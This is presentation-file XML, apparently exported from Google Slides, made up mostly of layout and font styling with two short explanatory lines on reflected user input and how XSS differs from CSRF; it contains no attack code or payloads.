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Lst>
  <p:sldSz cy="5143500" cx="9144000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Arimo"/>
      <p:regular r:id="rId97"/>
      <p:bold r:id="rId98"/>
      <p:italic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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Arimo-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font" Target="fonts/Arimo-regular.fntdata"/><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font" Target="fonts/Arimo-italic.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Arimo-bold.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96a9aa7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96a9aa7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96a9aa7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96a9aa7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96a9aa7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96a9aa7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96a9aa7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96a9aa7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be1a76a9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be1a76a9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be1a76a9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be1a76a9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be1a76a9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be1a76a9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be1a76a9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be1a76a9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96a9aa7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96a9aa7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96a9aa7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96a9aa7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8e876c2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8e876c2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8e876c28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8e876c28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8e876c28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8e876c28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8e876c28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8e876c28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8e876c28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8e876c28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96a9aa7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396a9aa7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8e876c28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8e876c28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96a9aa7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96a9aa7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55b5776b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5b5776b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5b5776bd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5b5776b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96a9aa7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396a9aa7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96a9aa7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96a9aa7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8e876c28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8e876c28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8e876c28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8e876c28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8e876c28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8e876c28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8e876c28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8e876c28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8e876c28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8e876c28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8e876c28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8e876c28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8e876c28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8e876c28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8e876c28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8e876c28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510666278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10666278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510666278e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510666278e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e876c28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e876c28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510666278e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510666278e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510666278e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510666278e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510666278e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510666278e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510666278e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510666278e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510666278e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510666278e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510666278e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510666278e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510666278e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510666278e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510666278e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510666278e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510666278e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510666278e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510666278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510666278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96a9aa7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96a9aa7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510666278e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510666278e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510666278e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510666278e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510666278e_0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510666278e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510666278e_0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510666278e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510666278e_0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510666278e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510666278e_0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510666278e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510666278e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510666278e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510666278e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510666278e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50fca99683_1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g50fca99683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ced19136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ced19136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96a9aa7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96a9aa7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50fca99683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50fca99683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510666278e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g510666278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Many websites take input from the user,conduct some activities and then send response to the user in a web page, with the original user input included on the response (i.e the user input is reflected back)</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510666278e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g510666278e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Many websites take input from the user,conduct some activities and then send response to the user in a web page, with the original user input included on the response (i.e the user input is reflected back)</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50fca99683_1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g50fca99683_1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50fca99683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g50fca99683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50fca99683_1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g50fca99683_1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50fca99683_1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g50fca99683_1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50fca99683_1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50fca99683_1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50fca99683_1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g50fca99683_1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50fca99683_1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g50fca99683_1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e876c28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e876c28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50fca99683_1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50fca99683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50fca99683_1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g50fca99683_1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50fca99683_1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g50fca99683_1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50fca99683_1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g50fca99683_1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50fca99683_1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5" name="Google Shape;605;g50fca99683_1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50fca99683_1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g50fca99683_1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50fca99683_1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g50fca99683_1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the CSRF has already been covered, this is a good time to ask whether we can get the User ID in CSRF? Without knowing the ID, attackers need to know the ID beforehand. In XSS attacks, attackers do not need to do that, they can get the ID directly from inside the page.</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50fca99683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g50fca99683_1_1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50fca99683_1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1" name="Google Shape;631;g50fca99683_1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50fca99683_1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9" name="Google Shape;639;g50fca99683_1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96a9aa7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96a9aa7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50fca99683_1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5" name="Google Shape;645;g50fca99683_1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50fca99683_1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g50fca99683_1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50fca99683_1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g50fca99683_1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50fca99683_1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g50fca99683_1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50fca99683_1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g50fca99683_1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50fca99683_1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g50fca99683_1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50fca99683_1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g50fca99683_1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50fca99683_1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g50fca99683_1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50fca99683_1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7" name="Google Shape;697;g50fca99683_1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50fca99683_1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3" name="Google Shape;703;g50fca99683_1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96a9aa7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96a9aa7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510666278e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510666278e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55600" lvl="0" marL="457200" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-342900" lvl="1" marL="914400" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="18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Arial"/>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rial"/>
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Arial"/>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Arial"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>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Arial"/>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Arial"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-304800" lvl="1" marL="914400" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-304800" lvl="2" marL="1371600" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1200"/>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-304800" lvl="3" marL="1828800" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1200"/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-304800" lvl="4" marL="2286000" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-304800" lvl="5" marL="2743200" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1200"/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-304800" lvl="6" marL="3200400" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1200"/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-304800" lvl="7" marL="3657600" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-304800" lvl="8" marL="4114800" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>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Arial"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-304800" lvl="1" marL="914400" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-304800" lvl="2" marL="1371600" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1200"/>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-304800" lvl="3" marL="1828800" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1200"/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-304800" lvl="4" marL="2286000" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-304800" lvl="5" marL="2743200" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1200"/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-304800" lvl="6" marL="3200400" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1200"/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-304800" lvl="7" marL="3657600" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-304800" lvl="8" marL="4114800" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>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rial"/>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Arial"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-304800" lvl="1" marL="914400" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-304800" lvl="2" marL="1371600" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1200"/>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-304800" lvl="3" marL="1828800" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1200"/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-304800" lvl="4" marL="2286000" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-304800" lvl="5" marL="2743200" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1200"/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-304800" lvl="6" marL="3200400" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr sz="1200"/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-304800" lvl="7" marL="3657600" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-304800" lvl="8" marL="4114800" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>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Font typeface="Arial"/>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Font typeface="Arial"/>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Arial"/>
              <a:buNone/>
              <a:defRPr sz="2100"/>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2100"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2100"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2100"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2100"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2100"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2100"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2100"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2100"/>
              <a:buFont typeface="Arial"/>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Font typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>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Arial"/>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89" name="Shape 89"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Google Shape;90;p23"/>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Font typeface="Arial"/>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Font typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
